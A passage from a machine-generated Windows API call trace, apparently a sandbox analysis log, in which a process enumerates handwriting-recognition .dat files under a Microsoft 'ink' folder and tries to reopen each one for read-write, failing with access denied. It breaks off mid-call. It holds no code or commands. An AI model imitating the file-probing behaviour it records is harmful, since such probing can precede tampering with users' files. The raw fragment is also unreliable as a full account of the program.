lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0099.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.769] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.769] AreFileApisANSI () returned 1 [0099.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat", lpUsedDefaultChar=0x0) returned 64 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.769] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.769] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0099.770] AreFileApisANSI () returned 1 [0099.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0099.770] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0099.770] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e828, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 64 [0099.770] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.770] GetFileType (hFile=0x368) returned 0x1 [0099.770] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0099.770] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.770] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.770] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.771] CloseHandle (hObject=0x368) returned 1 [0099.771] AreFileApisANSI () returned 1 [0099.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0099.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat") returned 64 [0099.771] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.771] GetLastError () returned 0x5 [0099.771] GetLastError () returned 0x5 [0099.771] SetLastError (dwErrCode=0x5) [0099.771] GetLastError () returned 0x5 [0099.771] SetLastError (dwErrCode=0x5) [0099.771] GetLastError () returned 0x5 [0099.771] SetLastError (dwErrCode=0x5) [0099.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0099.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.771] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.771] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c8ce781, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe38781cd, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe38781cd, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x10cb30, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0099.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0099.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0099.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.772] AreFileApisANSI () returned 1 [0099.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat", lpUsedDefaultChar=0x0) returned 66 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.772] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0099.773] AreFileApisANSI () returned 1 [0099.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0099.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82b08 [0099.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82b08, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 66 [0099.773] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.773] GetFileType (hFile=0x368) returned 0x1 [0099.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b08 | out: hHeap=0x20000) returned 1 [0099.773] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.773] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.773] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.774] CloseHandle (hObject=0x368) returned 1 [0099.774] AreFileApisANSI () returned 1 [0099.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0099.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82a78 [0099.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d3c8, cbMultiByte=-1, lpWideCharStr=0x82a78, cchWideChar=66 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat") returned 66 [0099.774] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.774] GetLastError () returned 0x5 [0099.774] GetLastError () returned 0x5 [0099.774] SetLastError (dwErrCode=0x5) [0099.774] GetLastError () returned 0x5 [0099.774] SetLastError (dwErrCode=0x5) [0099.774] GetLastError () returned 0x5 [0099.774] SetLastError (dwErrCode=0x5) [0099.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82a78 | out: hHeap=0x20000) returned 1 [0099.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0099.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.774] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cc99ae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb28b2edf, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb28b2edf, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x2662f0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5ef58 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0099.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0099.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.775] AreFileApisANSI () returned 1 [0099.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat", lpUsedDefaultChar=0x0) returned 64 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.776] AreFileApisANSI () returned 1 [0099.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0099.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0099.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e7a0, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 64 [0099.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.776] GetFileType (hFile=0x368) returned 0x1 [0099.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0099.776] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.776] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.777] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.777] CloseHandle (hObject=0x368) returned 1 [0099.777] AreFileApisANSI () returned 1 [0099.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0099.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0099.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6e360, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat") returned 64 [0099.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.777] GetLastError () returned 0x5 [0099.777] GetLastError () returned 0x5 [0099.777] SetLastError (dwErrCode=0x5) [0099.777] GetLastError () returned 0x5 [0099.777] SetLastError (dwErrCode=0x5) [0099.777] GetLastError () returned 0x5 [0099.777] SetLastError (dwErrCode=0x5) [0099.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0099.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.777] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.777] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85cc99ae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xb281a570, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xb281a570, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x339380, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0099.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 